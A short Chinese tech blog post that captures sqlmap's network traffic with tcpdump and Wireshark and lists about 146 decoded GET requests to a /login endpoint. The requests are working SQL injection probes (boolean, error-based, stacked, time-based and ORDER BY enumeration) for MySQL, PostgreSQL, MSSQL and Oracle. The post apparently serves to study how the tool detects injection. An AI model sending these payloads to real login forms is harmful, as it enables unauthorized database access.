kk Blog —— 通用基础


date [-d @int|str] [+%s|"+%F %T"]
netstat -ltunp
sar -n DEV 1

sqlmap抓包

用tcpdump抓包,wireshark导出text,urldecode解码,得到sqlmap的注入语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=2795&password=123 HTTP/1.1 
GET /login?username=abc((),",),.'&password=123 HTTP/1.1 
GET /login?username=abc'VOhiEk<'">ULNwju&password=123 HTTP/1.1 
GET /login?username=abc') AND 2781=9607 AND ('Rnuk'='Rnuk&password=123 HTTP/1.1 
GET /login?username=abc' AND 2247=4788 AND 'ddJs'='ddJs&password=123 HTTP/1.1 
GET /login?username=abc) AND 6875=6686 AND (3318=3318&password=123 HTTP/1.1 
GET /login?username=abc AND 3033=6740&password=123 HTTP/1.1 
GET /login?username=abc AND 9516=5869-- dooX&password=123 HTTP/1.1 
GET /login?username=(SELECT (CASE WHEN (2922=6853) THEN 'abc' ELSE (SELECT 6853 UNION SELECT 6863) END))&password=123 HTTP/1.1 
GET /login?username=abc') AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND ('WLxo'='WLxo&password=123 HTTP/1.1 
GET /login?username=abc' AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND 'EnIq'='EnIq&password=123 HTTP/1.1 
GET /login?username=abc) AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND (1539=1539&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))-- Zpqd&password=123 HTTP/1.1 
GET /login?username=abc') AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('yoJQ'='yoJQ&password=123 HTTP/1.1 
GET /login?username=abc' AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'rRrm'='rRrm&password=123 HTTP/1.1 
GET /login?username=abc) AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (9921=9921&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- MRHt&password=123 HTTP/1.1 
GET /login?username=abc') AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('uWsT'='uWsT&password=123 HTTP/1.1 
GET /login?username=abc' AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'autW'='autW&password=123 HTTP/1.1 
GET /login?username=abc) AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (6576=6576&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- bXtg&password=123 HTTP/1.1 
GET /login?username=abc') AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('VlYe'='VlYe&password=123 HTTP/1.1 
GET /login?username=abc' AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'XgIT'='XgIT&password=123 HTTP/1.1 
GET /login?username=abc) AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (6471=6471&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- IRUY&password=123 HTTP/1.1 
GET /login?username=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (6090=6090) THEN '1' ELSE '0' END)),'qzkjq'))&password=123 HTTP/1.1 
GET /login?username=abc');SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc');WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc';WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc);WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc;WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc') AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND ('BoHR'='BoHR&password=123 HTTP/1.1 
GET /login?username=abc' AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND 'IFHW'='IFHW&password=123 HTTP/1.1 
GET /login?username=abc) AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND (2757=2757&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)-- zwZm&password=123 HTTP/1.1 
GET /login?username=abc') AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND ('CuGS'='CuGS&password=123 HTTP/1.1 
GET /login?username=abc' AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND 'WmPH'='WmPH&password=123 HTTP/1.1 
GET /login?username=abc) AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND (6554=6554&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))-- OgwJ&password=123 HTTP/1.1 
GET /login?username=abc') WAITFOR DELAY '0:0:5' AND ('jCFc'='jCFc&password=123 HTTP/1.1 
GET /login?username=abc' WAITFOR DELAY '0:0:5' AND 'FpFX'='FpFX&password=123 HTTP/1.1 
GET /login?username=abc) WAITFOR DELAY '0:0:5' AND (7644=7644&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'-- sPYO&password=123 HTTP/1.1 
GET /login?username=abc') AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND ('BmJW'='BmJW&password=123 HTTP/1.1 
GET /login?username=abc' AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND 'svZV'='svZV&password=123 HTTP/1.1 
GET /login?username=abc) AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND (8259=8259&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)-- tkiR&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 1-- xBKA&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 2552-- QaqN&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 1-- CXec&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 5386-- OCdf&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 1-- qihI&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 8561-- muFp&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- zHug&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 6155-- jbRk&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- JNHc&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 7301-- lLsH&password=123 HTTP/1.1 
GET /login?username=abc&password=1760 HTTP/1.1 
GET /login?username=abc&password=123).),"')((. HTTP/1.1 
GET /login?username=abc&password=123'JHsedc<'">YLcugw HTTP/1.1 
GET /login?username=abc&password=123) AND 9079=5601 AND (1335=1335 HTTP/1.1 
GET /login?username=abc&password=123 AND 1857=7867 HTTP/1.1 
GET /login?username=abc&password=123 AND 8511=5177-- pZVc HTTP/1.1 
GET /login?username=abc&password=123') AND 7997=8676 AND ('HkRV'='HkRV HTTP/1.1 
GET /login?username=abc&password=123' AND 1648=3770 AND 'QrJb'='QrJb HTTP/1.1 
GET /login?username=abc&password=(SELECT (CASE WHEN (5600=9308) THEN 123 ELSE (SELECT 9308 UNION SELECT 4757) END)) HTTP/1.1 
GET /login?username=abc&password=123) AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND (8074=8074 HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71))-- mRSf HTTP/1.1 
GET /login?username=abc&password=123') AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND ('hMli'='hMli HTTP/1.1 
GET /login?username=abc&password=123' AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND 'PpkB'='PpkB HTTP/1.1 
GET /login?username=abc&password=123) AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (7589=7589 HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- AWtz HTTP/1.1 
GET /login?username=abc&password=123') AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('Kndh'='Kndh HTTP/1.1 
GET /login?username=abc&password=123' AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'ynpj'='ynpj HTTP/1.1 
GET /login?username=abc&password=123) AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (4254=4254 HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- Cppc HTTP/1.1 
GET /login?username=abc&password=123') AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('jrda'='jrda HTTP/1.1 
GET /login?username=abc&password=123' AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'Hxec'='Hxec HTTP/1.1 
GET /login?username=abc&password=123) AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (3323=3323 HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- ipPa HTTP/1.1 
GET /login?username=abc&password=123') AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('LKje'='LKje HTTP/1.1 
GET /login?username=abc&password=123' AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'qtMI'='qtMI HTTP/1.1 
GET /login?username=abc&password=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (8658=8658) THEN '1' ELSE '0' END)),'qzkjq')) HTTP/1.1 
GET /login?username=abc&password=123);SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123);WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123;WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123');WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123';WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123) AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND (5534=5534 HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG)-- wyKY HTTP/1.1 
GET /login?username=abc&password=123') AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND ('doQl'='doQl HTTP/1.1 
GET /login?username=abc&password=123' AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND 'IMvM'='IMvM HTTP/1.1 
GET /login?username=abc&password=123) AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND (8248=8248 HTTP/1.1 
GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) HTTP/1.1 
GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5))-- PgeE HTTP/1.1 
GET /login?username=abc&password=123') AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND ('OoDW'='OoDW HTTP/1.1 
GET /login?username=abc&password=123' AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND 'Zqlk'='Zqlk HTTP/1.1 
GET /login?username=abc&password=123) WAITFOR DELAY '0:0:5' AND (6147=6147 HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5' HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5'-- hVmx HTTP/1.1 
GET /login?username=abc&password=123') WAITFOR DELAY '0:0:5' AND ('oDNw'='oDNw HTTP/1.1 
GET /login?username=abc&password=123' WAITFOR DELAY '0:0:5' AND 'tWTl'='tWTl HTTP/1.1 
GET /login?username=abc&password=123) AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND (5787=5787 HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5)-- Djiq HTTP/1.1 
GET /login?username=abc&password=123') AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND ('Lyac'='Lyac HTTP/1.1 
GET /login?username=abc&password=123' AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND 'APIe'='APIe HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 1-- TMmJ HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 9030-- RTTw HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- mDvA HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1200-- eNbW HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- sYTq HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 8916-- lILp HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 1-- AOfY HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 6451-- Hzva HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 1-- Pauy HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 9918-- mEOJ HTTP/1.1 

tools, sqlmap

« sqlmap常用语句 nignx的proxy_set_header快速理解 »